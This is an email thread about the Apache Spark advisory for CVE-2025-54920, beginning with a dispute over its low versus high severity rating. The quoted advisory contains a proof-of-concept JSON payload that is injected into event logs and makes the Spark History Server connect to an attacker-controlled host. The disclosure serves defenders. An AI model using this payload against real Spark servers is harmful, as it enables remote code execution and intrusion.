Hi Tres, It was initially reported as high but I updated it to low after looking at how difficult it was trigger (existing user required relatively high permissions), but looks like there was an additional field to update. I’ll take a look and see what I can do to update that.
Cheers, Holden Twitter: https://twitter.com/holdenkarau Fight Health Insurance: https://www.fighthealthinsurance.com/ <https://www.fighthealthinsurance.com/?q=hk_email> Books (Learning Spark, High Performance Spark, etc.): https://amzn.to/2MaRAG9 <https://amzn.to/2MaRAG9> YouTube Live Streams: https://www.youtube.com/user/holdenkarau Pronouns: she/her On Wed, Mar 18, 2026 at 6:12 AM Tres Pittman <[email protected]> wrote: > Hi Holden > > Why does your email say severity is Low? > > According to GitHub and other sources, severity is actually High > > > Best, > Tres > > Sent from Proton Mail for iOS. > > -------- Original Message -------- > On Friday, 03/13/26 at 16:14 Holden Karau <[email protected]> wrote: > Severity: low > > Affected versions: > > - Apache Spark (org.apache.spark:spark-core_2.13, > org.apache.spark:spark-core_2.12) before 3.5.7 > - Apache Spark (org.apache.spark:spark-core_2.13, > org.apache.spark:spark-core_2.12) 4.0.0 before 4.0.1 > > Description: > > This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are > recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the > issue. > > > > > > Summary > > Apache Spark 3.5.4 and earlier versions contain a code execution > vulnerability in the Spark History Web UI due to overly permissive Jackson > deserialization of event log data. This allows an attacker with access to > the Spark event logs directory to inject malicious JSON payloads that > trigger deserialization of arbitrary classes, enabling command execution on > the host running the Spark History Server. > > > > > > Details > > The vulnerability arises because the Spark History Server uses Jackson > polymorphic deserialization with @JsonTypeInfo.Id.CLASS on > SparkListenerEvent objects, allowing an attacker to specify arbitrary class > names in the event JSON. This behavior permits instantiating unintended > classes, such as org.apache.hive.jdbc.HiveConnection, which can perform > network calls or other malicious actions during deserialization. > > > The attacker can exploit this by injecting crafted JSON content into the > Spark event log files, which the History Server then deserializes on > startup or when loading event logs. For example, the attacker can force the > History Server to open a JDBC connection to a remote attacker-controlled > server, demonstrating remote command injection capability. > > > > > > > Proof of Concept: > > 1. Run Spark with event logging enabled, writing to a writable directory > (spark-logs). > > 2. Inject the following JSON at the beginning of an event log file: > > > { > > "Event": "org.apache.hive.jdbc.HiveConnection", > "uri": "jdbc:hive2://<IP>:<PORT>/", > "info": { > "hive.metastore.uris": "thrift://<IP>:<PORT>" > } > } > > > > > > > > 3. Start the Spark History Server with logs pointing to the modified > directory. > > 4. The Spark History Server initiates a JDBC connection to the attacker’s > server, confirming the injection. > > > > > > > > > > > Impact > > An attacker with write access to Spark event logs can execute arbitrary > code on the server running the History Server, potentially compromising the > entire system. > > This issue is being tracked as SPARK-52381 > > Credit: > > Alexandre Pujol (Linagora) (finder) > > References: > > https://github.com/apache/spark/pull/51312 > https://github.com/apache/spark/pull/51323 > https://issues.apache.org/jira/browse/SPARK-52381 > https://spark.apache.org/ > https://www.cve.org/CVERecord?id=CVE-2025-54920 > https://issues.apache.org/jira/browse/SPARK-52381 > > > --------------------------------------------------------------------- > To unsubscribe e-mail: [email protected] > > > > --------------------------------------------------------------------- > To unsubscribe e-mail: [email protected] > >
